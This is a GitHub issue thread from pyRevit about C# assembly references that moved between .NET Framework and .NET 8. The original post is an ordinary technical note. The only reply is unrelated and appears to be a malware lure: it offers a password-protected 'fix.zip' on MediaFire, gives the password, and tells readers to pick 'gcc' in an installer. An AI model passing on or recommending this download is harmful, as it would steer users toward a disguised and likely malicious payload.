### ISSUE TITLE
Changes in C# references between .Net and NetCore

### ISSUE THREAD

**Issue by jmcouffin** [pyrevitlabs/pyRevit#2376]
## System

- Enum
> What was included in the .net framework System.dll is now split into multiple assemblies in .NET 8. In this case, the enum (and other things of the System.ComponentModel namespace) are moved to the System.ComponentModel.TypeConverter.dll assembly.

https://discourse.pyrevitlabs.io/t/release-date-pyrevit-2025/3083/57?u=jean-marc
- Console

https://github.com/pyrevitlabs/pyRevit/issues/2375#issuecomment-2308499906

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
